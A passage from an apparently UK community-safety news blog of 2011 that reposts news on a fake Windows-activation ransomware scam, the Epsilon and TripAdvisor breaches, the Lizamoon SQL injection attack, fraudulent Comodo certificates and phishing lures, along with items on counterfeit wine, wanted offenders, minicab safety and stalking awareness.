- If still no action is taken, regardless of whether the fine is paid, then your car can be wheel-clamped, impounded or destroyed.
- You could face a court prosecution, with a possible maximum penalty of £1000.

Road Safety Minister Mike Penning says: " Uninsured drivers push up premiums for other motorists and they often drive with no regard for other road users, so it's vital we do everything we can to keep them off the roads. More than 400 vehicles are seized by the police every day, but its just not possible to catch every uninsured driver in this way. These new powers will help us take real action".

* CSMA = Civil Service Motoring Association

(18th April 2011)


 RAMSOMWARE SQUEEZES USERS WITH BOGUS WINDOWS ACTIVATION DEMAND
(Computerworld, dated 11th April 2011 author Gregg Keizer)
www.computerworld.com

A new Trojan tries to extort money from users by convincing them to dial international telephone numbers to reactive Windows, a security researcher said today.

Once on a PC, the malware displays a message claiming that Windows is "locked" and must be reactivated, said Mikko Hypponen, the chief research officer of Helsinki-based F-Secure. Users seeing the message cannot boot Windows in either normal or Safe mode, Hypponen said.

"This copy of Windows is locked. You may be a victim of fraud or there may be an internal error," the message states.

To regain control of the PC, users are told to reactivate Windows online or via a phone call. The former, however, is not available; a follow-up message instructs users to dial one of six telephone numbers, then enter a six-digit code to reactivate the operating system.

"The call from your country is free of charge," the second message alleges.

Not even close.

"They pretend to be Microsoft," said Hypponen, adding that the telephone numbers actually lead to an automated call center where users are kept on hold for several minutes, racking up long-distance charges.

F-Secure is trying to determine the location of the call center.

The scammers make money through what Hypponen called "short stopping," the practice of billing a call at a rate higher than the actual destination.

"The numbers are operated by rogue operators and lead to [countries with] very expensive phone rates, like the Dominican Republic or Somalia," Hypponen said in an interview Monday. "But the numbers actually end up in much cheaper countries. They charge you the full price.... That's how they make money."

F-Secure has seen that money-making mechanism used before in a Windows Mobile Trojan horse that secretly dialed international numbers to rack up charges via short stopping.

But it's new in "ransomware," the term describing malware that tries to extort a payment in return for returning control of the computer or its files to the owner.

"Ransomware makers come up with a new payment mechanism every time one is shut down," said Hypponen. One of the most prevalent pieces of ransomware, "GPcode," told victims to use a pre-paid credit card, an avenue that has since been blocked.

Extortion software like GPCode and the newest Trojan are not only booming, but present a clear danger to users, Hypponen argued.

"For the end user, most of the damage by malware is transient," he said. "If you're infected by a bot Trojan, your PC may send out lots of spam, but if anything, that slows down your PC only a bit. Even keyloaders, if they get ahold of your credit card, you don't actually lose money because you can get it back. But ransomware is bad news, because the PC is unusable or all your files are encrypted."

The solution to ransomware is to either fork over the payoff or roll back the PC to a prior backup, assuming one is available, said Hypponen,

Or in this case, enter the code F-Secure said was delivered by the call center, no matter what number is dialed.

That unlock code: 1351236.

"I hate the idea of paying money to these clowns," said Hypponen. "Just enter that code."

(18th April 2011)


 

FAKE "JACOBS'S CREEK"WINE BOTTLES
(Metro. dated 6th April 2011 author Metro web reporter )
www.metro.co.uk

Hundreds of bottles of counterfeit Jacob's Creek vino have already been seized from off-licences around the country.

The wine seized includes the Cabernet Sauvignon 2007, Merlot 2009, Semillon Sauvignon Blanc 2008, Chardonnay 2009 and Semillon Chardonnay 2009.

Consumers have been told to keep an eye out for any bottles with the word 'Australia' misspelt - on the fake bottle it appears 'Austrlia'.

There is one other sign which indicates the plonk is not the real deal - it tastes terrible.

Pernod Ricard UK, the owner of Jacob's Creek, said it first noticed the problem when it began receiving complaints about the quality of the wine. The company immediately launched an investigation and discovered the fake bottles on sale

The bottles, which normally retail for between £6 and £10, are believed to be from China and are being sold to off-licences and independent shops for as little as £2.

Deputy managing director of wine for Pernod Ricard Simon Thomas said: 'Tests indicate the content is not harmful but anyone with doubts concerning the authenticity should not consume it.'

Colin Houston, head of food fraud and incidents at the Food Standards Agency, urged consumers to remain vigilant and look out for bottles with spelling mistakes.

(18th April 2011)



SOME RETAILERS AND BANKS HAVE BEEN EFFECTED BY A SECURITY BREACH - BE WARNED

 

This morning when I openned my e mails I had received two warnings of a security breach. One was from Marks and Spencer and the other was from Marriott the hotel group. The e mails had a common content and stated that their suppliers ( Epsilon ) computer system had been attacked by a hacker and that individuals who had their names and e mail addresses registered to receive details of offers etc were effected.

The e mail went on to say that customers are warned to watch out for phishing attacks trying to obtain personal details. Phrases like "pushing the buck" and "slippery Shoulders" came to my mind in relation to these two organisations attitude.

The computing press was aware of this problem Friday of last week. Epsilon, is a marketing company who sends out millions of advertising e-mails of behalf of their clients every week. Currently they appear to be quite tight lipped as to who have been effected, saying that only about 50 of their clients were hit. These include :

Financial

Ameriprise Financial ( Financial advice and Investment )
Barclays, Bank Best
Citibank ( Banking and Investments )
JP Morgan Chase ( banking and investment )
Robert Half ( Financial Recruitment )
US Bank

Retailer

AbeBooks (UK online book seller)
Buy Brookstone (US Coupon company )
Kroger (US Retail food chain)
Lacoste
Marks and Spencer
New York & Company (US Womens clothes retailer)
Target ( US general store chain )
Walgreens (US Pharmacy retailer)

Travel, Entertainment and publishing

Disney Destinations
Hilton Worldwide
Marriott International
McKinsey Quarterly (US Business journal)
TiVo

So effectively millions of customers of Epsilon clients are at potential risk. Please be warned that if you do deal with any of these organisations ( and those currently unknown ) you may start to receive e mails from malicious sources. So as always do not divulge any information to unsolicited e-mails.

On the Epsilon website they state that that they are the best at what they do. Obviously security doesn't come under that heading. My other concern is that the likes of Marks and Spencer don't check the level of security used by their suppliers before signing up to contracts !

For further information on this problem look at the article "ABOUT 50 CLIENTS HIT BY EPSILON E-MAIL MARKETING BREACH" in Business News section of this website.

(6th April 2011)


 

WHO DO YOU THINK YOU'RE TALKING TO ?
(West Yorkshire Police, dated 3rd April 2011)

West Yorkshire Police have launched an interactive DVD aimed at breaking down barriers between police and young people.

'Who do you think you're talking to?' is directed at both officers and youths and includes interviews with both groups about their perceptions of one another.

Puppets are used to represent those interviewed, while a virtual police office encourages viewers to take part in activities and discussions about the relationships with the police and youngsters.

Officers are able to listen to the views of young people about the police and how they are perceived by them.

The DVD will be shown around schools across the county and will also be used as a training resource for PCs and PCSOs about youth engagement.

Ch Supt Barry South of the Operations Support Division is featured in the DVD providing advice on how to build a rapport with the younger generation.

He said: "This is a clever and creative way of improving the relationship between young people and our officers. There is a negative perception of both sets of people and we want to be able to move away from the stereotypes and work together to improve the quality of life within our communities.

"We want young people to be able to see beyond the police uniform and to realise that we are not out there to target them but we are there to protect and serve the people of West Yorkshire, including them.

"The interviews featured in the DVD allow us, as police officers, to listen and learn about how young people really perceive us and we can take this on board and use this as a platform to improve youth engagement."

To access the resource please click on the following link

www.westyorkshire.police.uk/wypuploads/whodoyouthinkyouretalkingto/

(4th April 2011)


 

CEOP ADDS TWINS TO MOST WANTED
(CEOP, dated 1st April 2011)
www.ceop.police.uk

Twin brothers, Kenneth John and Thomas Anthony Parker, both convicted high risk child sex offenders are the focus of a new appeal, as the UK's national centre for child protection - the Child Exploitation and Online Protection (CEOP) Centre - joins forces with police in Sussex and Warwickshire to publish their details on the Most Wanted website.

CEOP's Most Wanted website - www.ceop.police.uk/wanted - has already seen 20 high risk convicted offenders located since its launch in 2006. The latest was earlier this month, when an offender handed himself in to police within 24 hours of being placed on the site.

Now Sussex and Warwickshire police are using the site to ask the public for help in locating the twins, who are classed as particularly high risk.

Kenneth John Parker and Thomas Anthony Parker, aged 56, are the 23rd and 24th offenders to have their details published on the website. They are both believed to have been in Europe, but their current location is unknown. They also have connections to France, Holland and Portugal and are believed to be together, although this is not confirmed.

They are both wanted for breaching their notification requirements of the sex offenders register, an offence which in itself carries up to five years in prison but in addition, Thomas Parker is wanted for a recall to prison.

Kenneth Parker is approx 5'8" tall, of medium build with short brown hair. He has distinctive tattoos on both his arms - a fish and wings from a Para regiment on his left arm and a dragon and a panther on his right.

Thomas Parker is approx 6'0" tall and is of a slim build. He has cropped brown hair and has previously had facial hair. He has a scar by his left eye and like his brother, has very distinctive tattoos on his arms - a Chinese carp, a naked lady, a swallow, a stallions head and a wizard.

It should be noted that they have both demonstrated violent tendencies in the past.

Since the launch of CEOP's Most Wanted site in November 2006, 20 of the 22 offenders posted have been located. These 20 offenders had been missing for a combined total of over 63 years.

Peter Davies, Chief Executive of the CEOP Centre says: "These are the second and third offenders to have been posted onto our Most Wanted site this month. Following the success of this month's previous offender handing himself him to the police, I want to ask members of the public to once again help us in locating these two dangerous individuals".

Sussex Police spokesperson: "This is the first time we have used the CEOP and Crimestoppers sites and we hope it will help find Kenneth Parker and his brother".

Detective Chief Inspector Nigel Jones from Warwickshire Police said: "The Child Exploitation and Online Protection (CEOP) Centre have an excellent record for locating convicted offenders and we are grateful for their support. We have done everything we can to locate Thomas Anthony Parker, a convicted high risk child sex offender and the next step is to work with international agencies, like CEOP, to appeal to the public throughout Europe to contact Crimestoppers anonymously on 0800 555 111 if you have information on either twin."

(4th April 2011)


 

THE MARKINGS ON A TAXI DON'T MEAN A THING
(The Idependent on Sunday, dated 27th Match 2011 author Kay Guest)
www.independent.co.uk
Category : personal  safety

Women in cabs need to trust the driver, not the livery

"If your minicab's not booked, it's just a stranger's car," read the posters with the image of the deserted car park. "Ten sexual assaults are committed by illegal cab drivers in London every month," say the TV ads so scary that they have a 15 certificate. We've all seen the campaigns, which are sponsored by the police. We know not to get into a cab that we didn't pre-book. We look out for the "distinctive licence discs" displayed in the windows.
Our hearts sank, then, when police who were looking for the missing Swindon woman, Sian O'Callaghan, whose body has now been found in Gloucestershire, called for sightings of a green Toyota Avensis "with taxi markings".

Police have become more sensitive about the way that they talk to women about crimes that affect us. They steer clear of telling us that if there's a dangerous rapist on the streets we must all stay at home. They finally seem to understand that it's not women who are to blame. But they find it harder to explain how we should stay safe. They probably haven't had to try finding a cab late at night when it's raining.

A couple of years ago, a scam was discovered whereby drivers were registering their cars as private hire vehicles in order to avoid paying the London congestion charge. For an £82 registration fee, followed by £27 a year, any clever driver could have that all-important Transport for London (TfL) roundel stuck to his windscreens, front and back.

When I called TfL on Friday to ask what's being done about this, I was reassured that "All private hire vehicles must pass an annual inspection... two MOT tests each year [and] a rigorous annual safety check", and that "all individuals applying to become a licensed taxi or private hire driver have to undergo an enhanced Criminal Records Bureau [CRB] check", among other things. But these rigorous checks are separate for driver and car. It seems that any old rapist can buy a TfL sticker.

That doesn't alter the fact that nobody should get into a cab that isn't pre-booked. But it's not always as simple as TfL would like. I've got into a car that I found outside a locked-up local minicab office, whose driver told me, "Of course I work here: I've got the TfL sticker to prove it." I've had a cabbie refuse to confirm the name under which I'd booked and pre-paid. You have to tell me your name," he said, "otherwise any stranger might jump in my cab and get a free lift home."

I asked him why any stranger would want a free lift to my house at 2am, at which point he told me to get out.

I've also called a cab to pick me up in a minor red-light district. The minicab office couldn't tell me my driver's car model, make, or licence number, leaving me to peer into every car with a male driver that slowed down. I found the cab eventually, but I wouldn't recommend this practice.

The London cab firm Addison Lee is particularly successful with women because it sends a text upon booking describing the car in detail and giving the driver's mobile phone number. But Addison Lee is not always available, even in London.

You can receive three registered cab firm numbers by texting "CAB" to 60835, says TfL, which also gives the following advice:

- Never approach a minicab on the street or accept the offer of a ride; the drivers are acting illegally. Only black cabs can pick passengers up on the street.

- Always book, so that there is a record of your journey.

- When your booked cab arrives, check it's for you and sit in the back.It's not always easy, but it is important.
- And most important of all is to remember that "taxi markings" mean nothing.

(4th April 2011)


 

RECLAIM OUR STREETS FROM THUGS, SAYS BARONESS
(SKY NEWS AND ANANOVA, dated 30th March 2011 no author quoted)
www.orange.co.uk and http://news.sky.com/skynews

Communities champion Baroness Newlove has called on members of the public to "reclaim their streets" in the fight against anti-social behaviour.

The widow of murdered father-of-three Garry Newlove said she wanted a new approach to neighbourhood crime that saw local people being given more power on their own streets.

Lady Newlove wrote in her first report as the Government's Champion for Active, Safer Communities, a role to which she was appointed last October, that she "wanted to make sure something positive" came out of the death of her husband.

Mr Newlove was 47 when he was kicked to death by a gang of teenagers outside his home in Warrington, Cheshire.

Working as an ambassador against anti-social behaviour, Lady Newlove has toured the UK in the past six months speaking to people about how best to tackle neighbourhood crime.

One of her recommendations is a scheme called Bling Back, which would see drug dealers' assets sold and the profits given back into communities where locals have provided police with information leading to convictions.

She also called for council tax rebates, or vouchers to spend on local services, to be given to those who take an active role in making their neighbourhood safer.
Lady Newlove said: "For too long now, too many people have either not known how to get involved, have not been listened to when they have tried to speak out, or simply felt that it wasn't worth it as nothing would ever change.

"This report sets out how we can change things by empowering local communities to reclaim their streets.

"Everyone has a role to play. Communities must begin to take more responsibility and local agencies must begin to lessen their grip on the decision-making process and trust the people they serve to solve problems for themselves."

Other recommendations include communities being given the power to set local speed limits, and the recently introduced crime maps being expanded so that people can use them to report crime and anti-social behaviour.

Writing in the foreword to the report, Our Vision For Safe And Active Communities, Lady Newlove said she had personally "suffered the devastating consequences of crime, disorder and unchallenged 'anti-social behaviour'".

During her time campaigning and gathering information for the report, Lady Newlove said she had seen many examples of the "people power" that could help "reclaim our communities".

She called for people to work together, adding: "To cynics who may be saying 'Here we go again, another set of recommendations, another report to gather dust', I'd like them to remember the spirit that sustained, then rebuilt this shattered country during and after the war."

Minister for crime prevention James Brokenshire said: "Since her appointment, Baroness Newlove has been working tirelessly to inspire, challenge, support and learn from areas across the country.

"I look forward to seeing how her report will help to shape how we approach community activism in the future."

Assistant Chief Constable Stuart Donald, the Association of Chief Police Officers spokesman on neighbourhood policing, said: "The police accept the challenge to build on the success of neighbourhood policing and recognise they have an important role in many of the recommendations being made."




Additional information

Baroness Newlove's recommendations for local areas to take forward include:

- 'Community Reward' - where information provided by the community leads to a conviction the community is given a reward to spend on crime prevention work.

- 'Bling Back' - where money made from selling local drug dealers' assets is handed back to the neighbourhood they blighted.

- letting communities set their own local speed limits.

- taking crime maps to the next level so people can use them to report crime and ASB and agencies can publish details of what action was taken against offenders.

- giving the public a single point of contact through the roll out of the 101 number to report ASB.

- providing council tax rebates, or vouchers for local businesses and services, for people who take part in activism.

- asking Police and Crime Commissioners to commit at least one per cent of their budget to grass roots community groups to use or have a say on.

The 60 page pdf report can be obtained from :

http://www.homeoffice.gov.uk/publications/crime/baroness-newlove-report

(4th April 2011)


EUROPEAN COMMISSION HIT BY CYBERATTACK
(IDG News Service, dated 24th March author Jennifer Baker)
www.idg.com
category : cyberattack

 

IDG News Service - The European Commission, including the body's diplomatic arm, has been hit by what officials said Thursday was a serious cyberattack.

The attack was first detected on Tuesday and commission sources have said that it was sustained and targeted.

External access to the commission's e-mail and intranet has been suspended and staff have been told to change their passwords in order to prevent the "disclosure of unauthorized information," according to an internal memo to staff. Staff at the commission, the European Union's executive and regulatory body, have also been told to send sensitive information via secure e-mail.

The event came just days ahead of the European Council summit being held on Thursday and Friday. The summit brings together the leaders of E.U. member states and crucial decisions will be made on economic strategy, the war in Libya and the future structure of the E.U.

This led to early speculation that the source of the attacks may be Libya, but the commission was quick to rule this out. The attack is thought to be similar to the cyberattack on the French government in the run up to the G20 Summit in February 2010. That assault involved malware and targeted e-mail, with some of the related stolen information redirected to China.

Commission administration spokesman Antony Gravili said officials would not speculate on the source of the attacks in such a sensitive security matter. He did, however, confirm that the attackers targeted the information of some commission officials, in particular at the External Action Service, the body's foreign diplomatic arm.

"We are already taking urgent measures to tackle this. An inquiry's been launched. This isn't unusual as the Commission is frequently targeted," said Gravili. He added that there was no concrete evidence that the attack is linked to the E.U. summit.

(4th April 2011)


 

MYSTERIOUS FACEBOOK WEB SEARCH BOX COULD BE MALWARE
(IDG News Service, dated 25th March 2011 author Juan Carlos Perez)
www.idg.com
Category : malware


A Web search box some users are seeing on their Facebook interface wasn't inserted by Facebook and could be the result of malware or a rogue browser plug-in or application.

AllFacebook, a blog devoted to Facebook-related news, first reported that a second search box had begun to appear on Facebook interfaces, right next to the legitimate site search bar.

The mysterious Web search box appeared perfectly integrated into the Facebook page layout, as if it were a native Facebook feature. However, Facebook is now saying that it didn't put that second search box there and that it could be a sign of malware infection.

"We are not testing the placement of a separate web search field and have no plans to do so. We believe the second search field or 'Search the Web" box appeared on peoples' accounts as the result of unknown actions by a third party targeting the browser -- potentially a browser plugin or malware -- unrelated to Facebook," a Facebook official told technology news blog Search Engine Land.

As Facebook members, users who think they might be affected by this situation have access to a free, browser-based virus scanning tool from McAfee, according to the company.

As the most popular social network and one of the world's largest sites, Facebook is in a constant battle against malicious hackers and online scammers who want to take advantage of its massive user base to commit fraud and spread malware.

At this point, it's not clear whether the sinister search box is the result of an external malware exploit or the work of a rogue Facebook application

(4th April 2011)


 

TRIPADVISOR SAYS EMAIL LIST OF MEMBERS STOLEN
(Network World, dated 24th March 2011 author Ellen Messmer)
www.networkworld.com
Category : spam phishing


The online travel community TripAdvisor on Thursday informed its members that an unspecified portion of the TripAdvisor email list of its membership was stolen in an attack on a vulnerability in its system.

The result is that TripAdvisor members should be aware they may receive some type of spam, the company said, adding that the incident is still under investigation.

The notification to TripAdvisor members went out in an email from co-founder and CEO Steve Kaufer, who wrote, "We're taking this incident very seriously and are actively pursuing the matter with law enforcement. The reason we are going directly to you with this news is that we think it's the right thing to do.".

TripAdvisor declined to provide further detail about the number of members involved, but said it has fixed the "source of the vulnerability and shut it down." The company noted it doesn't collect credit card or financial information, and does not sell or rent its member list. The company also believes that despite the data-breach incident, member passwords "remain secure."

(4th April 2011)


 

HIT IN MASSIVE WEB ATTACK
(BBC News, dated 1st April 2011)
www.bbc.co.uk

Hundreds of thousands of websites appear to have been compromised by a massive cyber attack.

The hi-tech criminals used a well-known attack vector that exploits security loopholes on other sites to insert a link to their website.

Those visiting the criminals' webpage were told that their machines were infected with many different viruses.

Swift action by security researchers has managed to get the sites offering the sham software shut down.

Code control
 
Security firm Websense has been tracking the attack since it started on 29 March. The initial count of compromised sites was 28,000 sites but this has grown to encompass many times this number as the attack has rolled on.

Websense dubbed it the Lizamoon attack because that was the name of the first domain to which victims were re-directed. The fake software is called the Windows Stability Center.

The re-directions were carried out by what is known as an SQL injection attack. This succeeded because many servers keeping websites running do not filter the text being sent to them by web applications.

By formatting the text correctly it is possible to conceal instructions in it that are then injected into the databases these servers are running. In this case the injection meant a particular domain appeared as a re-direction link on webpages served up to visitors.

Early reports suggested that the attackers were hitting sites using Microsoft SQL Server 2003 and 2005 and it is thought that weaknesses in associated web application software are proving vulnerable.

Ongoing analysis of the attack reveals that the attackers managed to inject code to display links to 21 separate domains. The exact numbers of sites hit by the attack is hard to judge but a Google search for the attackers' domains shows more than three million weblinks are displaying them.

Security experts say it is the most successful SQL injection attack ever seen.

Generally, the sites being hit are small businesses, community groups, sports teams and many other mid-tier organisations.

Currently the re-directs are not working because the sites peddling the bogus software have been shut down.

Also hit were some web links connected with Apple's iTunes service. However, wrote Websense security researcher Patrick Runald on the firm's blog, this did not mean people were being redirected to the bogus software sites.

"The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer," he wrote.

(4th April 2011)


 

WHO IS USING YOUR INTERNET ACCESS ?

The following article describes a crime where an individual stole products from a US company by stealings peoples identity. Not only that, he almost got some of his UK neighbours arrested as he used their Broadband WiFi access to commit the online crime.

Morale of the tale : Protect yourself !

- Change your computer passwords regularly at work and home.
- Ensure that your home WiFi has security level WAP or higher (ie. your computer "speaks" to your router only after an exhange of an exclusive password).

HACKER JAILED OVER VIRTUAL GAMING CHIPS SCAM
(Guardian, dated 18th March author Steven Morris)
www.guardian.co.uk

British computer hacker who stole 400bn virtual gaming chips from an international gaming company has been jailed for two years.

Ashley Mitchell, 29, broke into the Zynga mainframe, stole the identity of two employees and transferred chips said to be worth more than £7m to himself.

Mitchell, of Paignton, Devon, sold the chips through Facebook to other gaming enthusiasts and used the money to fund his online gambling addiction.

More than 50 million people a day play Zynga games, including Mafia Wars, in which players run a virtual mob business, and FarmVille, which allows users to create their dream farm. Players have to buy chips for their virtual worlds. A black market in cut-price chips has grown up on the internet.

Mitchell, a former council accounts clerk, made £53,612 in two months after selling about a third of the chips.

But James Taghdissian, prosecuting, told Exeter crown court that Zynga put its loss at $12m (£7m). "That is what they estimate they would have lost if all the chips were successfully sold on," he said.

He said the company became aware in August 2009 that large amounts of chips were vanishing and suspected the two employees whose identities Mitchell had adopted. However, investigators then realised the system had been hacked and narrowed the search to Paignton. Mitchell's neighbours had their computers seized because he was "piggy-backing" on their unsecured Wi-Fi connections. Mitchell was eventually identified because he used his own Facebook profile during one of his attempts to hack into the system.

Taghdissian said: "It was clear there had been a systematic approach adopted in probing and accessing Zynga. Checks on [Mitchell's] bank account showed at this time he bought items including a Rolex watch and was also spending money on online gambling."

"He made determined and repeated efforts to attack Zynga's systems. He succeeded and transferred 400bn chips and sold them to realise a substantial profit."

Ben Darby, defending, said the loss to Zynga was impossible to quantify because the chips were virtual and the company could create as many as it wants.

He said Mitchell had enjoyed little benefit and spent most of the proceeds on online gambling on other sites that use real money.

He said: "Gambling had complete control of his life." He said his client was now an internet entrepreneur with his own Facebook poker site called Gambino, which could earn him more than £100,000 a year.

Mitchell admitted computer misuse and four counts of money laundering and asked for 41 similar cases to be considered. He was also sentenced to 30 weeks for breaching a 40-week suspended sentence imposed in 2008 for hacking into the computer system of Torbay council, where he once worked.

Judge Philip Wassall told him: "The dishonesty in this case was substantial and protracted. Online security is a priority for everyone these days.

"You deprived Zynga of income. It is quite clear you used a considerable degree of expertise and persistence to hack into the system.

"It is a considerable aggravating feature that someone hacks into systems in this way when so much business and personal finance is done using electronic means.

"From internet banking to major international transactions, people rely on the security of systems and anyone who comes before the courts who has gone through these security systems from their own ends can expect custody.

"The sentence has to reflect the impact on public confidence in security systems and online business when someone breaches security in this way."

(26th March 2011)



IRAN LINKED TO ATTACK, FRAUDULENT SSL CERTS, TARGETING GOOGLE, SKYPE, YAHOO
(Computer World, dated 23rd March 2011 author Darlene Storm)
www.computerworld.com

 

The following is an extract of an article. For the full article go to :
http://cwonline.computerworld.com/t/7261493/753476122/377070/0/

The majority of users probably feel safe upon seeing the padlock on their browser window which would seem to indicate it's secure and safe to communicate with an e-mail account or a bank. While SSL is better than nothing, we also know it certainly does not stop man-in-the-middle (MITM) attacks. More or less, we trust our browsers to silently accept trustworthy digital certificates from a Certificate Authority (CA) so that we can trust that a site to which we surfed is the authentic and actual site. But with compromised CAs, the cyberthugs behind the rogue certificates can impersonate the HTTPS traffic for those sites. Think of how many people use Google, Skype, or Yahoo. This was big, folks!

It can be extremely involved to wrap your brain around Certificate Authorities (CA), how they work, and how the system is flawed. An attacker with fake certificates and access to a target's Internet connection can launch a MITM attack, thereby making it possible to eavesdrop, observing and/or recording all encrypted web traffic to the compromised site while the user is clueless to what is happening. Even if it's not your Big Brother, someone's Big Brother was in their browser and handing out certified lies. Thank goodness there are people like Jacob Appelbaum watching out for us to spot fraudulent CAs.

Security researcher and Tor ( note 1 ) developer Jacob Appelbaum did great investigating and then a wonderful write up on the Certificate Authorities (CA) compromise and near cover-up of several fraudulent certs. Appelbaum, also known as "ioerror" on Twitter, discovered the CA compromise in the wild. He writes, "Last week, a smoking gun came into sight: A Certification Authority appeared to be compromised in some capacity, and the attacker issued themselves valid HTTPS certificates for high-value web sites. With these certificates, the attacker could impersonate the identities of the victim web sites or other related systems, probably undetectably for the majority of users on the internet."

He contacted Google and Mozilla, but was held to an embargo about the disclosure. The compromised certificates were issued by USERTRUST Network which is part of Comodo. Google had patched its own browser Chrome last week and Mozilla  managed to include the blacklist in Firefox 4 ( another browser ). When Mozilla blogged about the issue, so did Applebaum - which included a detailed explanation as well as suspecting "this action was taken by a state level adversary."

After Comodo ( note 2 )finally issued a statement, it confirmed that Appelbaum's suspicions were true. His update states that the CA compromise "was a targeted attack by a state level actor and they [Comodo] have named Iran as the country they suspect....In the details of their statement we have a confirmation that they have the ability to monitor and thus surveille people who wish to know if certificates are valid." 

According to the Internet Storm Center SANS (note 3) , the targets included Microsoft's login.live.com, Google's mail.google.com, google.com, login.yahoo.com (3 certificates), login.skype.com, addons.mozilla.com, and "Global Trustee."

US-Cert (note 4 ) also posted a notification of the fraudulent SSL certificates and Microsoft released a security advisory about the fraudulent digital certificates which can allow spoofing. Before Comodo released a statement, there was speculation on Hacker News that it might be the Chinese government. Although the IPs were from an ISP in Iran, who can say for absolutely certain right now who it was, either the Iranian government or another state-sponsored actor trying to make it look like Iran?

As Appelbaum wrote, "Blocking specific serial numbers or relying on flawed, provably broken methods of revocation will simply not cut it anymore. When the actual protection mechanisms are not enforced, there is little hope of end users being protected....This should serve as a wake up call to the internet. We need to research, build, and share new methods for ensuring trust, identity, authenticity, and confidentiality on the internet....Certification Authorities may continue to provide a piece of the puzzle but it's high time we ensure that they're not the alpha and the omega, anymore."



Addtional Information

 


WHAT IS SSL ?

SSL (Secure Sockets Layer) is the standard security technology for establishing an encrypted link between a web server and a browser (eg. Internet Explorer, Firefox, Chrome etc). This link ensures that all data passed between the web server and browsers remain private and integral. SSL is an industry standard and is used by millions of websites in the protection of their online transactions with their customers.

As a user all you normally need to be concerned about when you carry out a financial transaction online is that "http" is replaced by "https" and a padlock also appears in the URL Task bar.

WHAT IS - MAN-IN-THE-MIDDLE (MITM) ATTACK ?

When you go online and enter the name of a website, your browser checks out the websites facilities ( level of security etc ). If it is a secure website (ie. for banking etc ) information will be returned to your browser from the bank system about its security facilities (Certs or Certificates). As a result "https" and a padlock will be displayed to indicate that communication between you and the "bank" are encrypted (coded).

But, if the data link between your computer and the banking system is intercepted by a MITM, it is that bogus system that returns a "false certificate" that your computer reacts to. As you type in all of your banking details and passwords the bogus system copies them and then forwards the information to the bonafide banking system. As a user, you would not notice the interception as you would be able to carry out your transactions as normal.


Note

1. A group that believes in online anonimity ( www.torproject.org )
2. A company who deals with online security. ( www.comodo.com )
3. Internet Storm Center ( www.isc.sans.org ). They appear to be a voluntary group that helps monitor the internet for malicious activity (see http://isc.sans.edu/about.html)
4. US-Cert : United States Computer Emergency Readiness Team ( part of Homeland Security ) : www.us-cert.gov

(26th March 2011)


 

MORE NEWS FROM MY SPAM INBOX !
Category : phishing
 
Well, so far this month I haven't received the regular adverts for various forms of pharmaceutical paraphernalia. My Internet Service Providers (ISP) spam filter has continued to do a very good job. In the last 2 weeks it has managed to filter out 7 phishing e mails and place them in a "be warned" post box.

The latest batch of phishing e-mails include :

Santander - Please update your banking details. Failure to do so will lead to online service suspension.

HSBC - Several attempts have been made to access your account, your account has been de-activated. Please supply your security information to re-activate. (nb. 2 received with different activity dates )

HSBC - You have an incoming payment. We are unable to process the payment as your details cannot be verified. To view the transaction and your current balance, please click on the link below.

Lloyds TSB - Due to our annual upgrade of Internet banking machineries we are currently engaged in customer information update. Click on the "Verify my Account" link.

HMRC - After the last annual calculation of your fiscal activity, we have determined that you are eligible to receive a tax refund of £468.50 GBP. Please click here to supply your banking information.

DHL ( Parcel Delivery Service ) - The parcel was send to your home address. And it will arrice within 7 bussness day. More information and the tracking number are attached in linked document. ( nb. There was a document attached to this e-mail - this was probably infected with malicious software ).

All of these e mails are bogus and are just phishing for your personal information. If you receive them, delete them immediately and do not open any attachments. If you are suspicious about activity on your bank account, contact your bank direct using a known telephone number, NOT contact details within these bogus e-mails.

(26th March 2011)


STALKING : TRUST YOUR INSTINCT
(Police Oracle, dated 16th March 2011 author Karen Thomas)
www.policeoracle.com

 

Note : This article has been slightly modified. The embedded links from within and have been placed at the base of the article.

A leading UK charity has today launched a campaign to increase the awareness of stalking and encourage potential victims to come forward and report the behaviour to the police.

The Network for Surviving Stalking (NSS) is asking people to Trust Your Instinct in identifying the behaviours exhibited by stalkers and to take the menacing nature of the offence seriously.

Police and professionals from the wider policing family have welcomed the move to empower victims to help officers investigate a crime that can be difficult to identify and address.

Jacqui Hames, former detective constable with the Met and BBC Crimewatch presenter, collaborated on developing a quiz (see below) to help victims differentiate between 'creepy' behaviour and stalking.

Officers can access a second version of the checklist (see below) that explains the reasoning and research behind each question, which Ms Hames hopes will prove useful should someone approach the police for help.

"Victims often don't understand what they are experiencing, so it is recognising what you are dealing with, listening to the victim and being that beacon of safety.

"A police officer's job is just as much about crime prevention as it is about detecting major crime. It is having an understanding of the behaviours, which could be the start of something serious, and knowing what you can do to stop it escalating."

According to the 2006 British Crime Survey, more than one million women and 900,000 men report being stalked every year.

Experts agree that seemingly inoffensive gestures are not crimes in themselves but, collectively and when sustained over time, they constitute a course of conduct considered an offence under the 1997 Protection from Harassment Act.

In some cases, the behaviour escalates into rape and murder, yet current research shows that 77 per cent of victims wait until they have endured more than 100 contacts before they will consider taking action.

Alexis Bowater, Chief Executive of the NSS, was emphatic when describing stalking as a form of psychological terrorism, in which every victim has their life stolen from them.

"This has been a secret, hidden crime for too long. Stalkers cloak their victims in a coat of isolation, despair, darkness and depression and make them think there is nobody to help them," she told PoliceOracle.com.

"Nowhere else in society would you accept a person being forced into a relationship. That is what stalking is all about."

Ms Bowater maintained that early intervention is key to tackling the offence.

"If victims can be empowered to come forward more quickly then that will be beneficial to not just the victims but to the officers investigating this crime.

"The stalking quiz is designed to help everybody."


 

Checklist (opens as a pdf ) : http://www.policeoracle.com/Downloads/stalking_quiz_for_the_police.pdf

Quiz ( opens as a pdf ) : http://www.policeoracle.com/Downloads/stalking_quiz_for_the_public.pdf

"Trust you instinct" film : http://vimeo.com/20812847

Network for Surviving Stalking website : www.nss.org.uk/

Link to original article : http://www.policeoracle.com/news/Stalking:-Trust-Your-Instinct_31841.html

(19th March 2011)


 

TOO SMART TO BE STUNG BY AN E-MAIL SCAM ?
(The Times, dated 16th March 2011 author Tim Dickinson)
www.thetimes.co.uk

So was Tim Dickson, until criminals hacked into his e-mail account, spun a false yarn and and began to rip off his friends

Like so many things in life, e-mail scams happen only to other people. The attempted frauds - such as the latest e-missive supposedly collecting cash donations for victims of the Japanese tsunami, on behalf of the Red Cross - are often so badly crafted that we are can hardly believe anyone would fall for them. But no longer. I have just been the victim of one that should chill the blood of anyone with a "social" e-mail account.

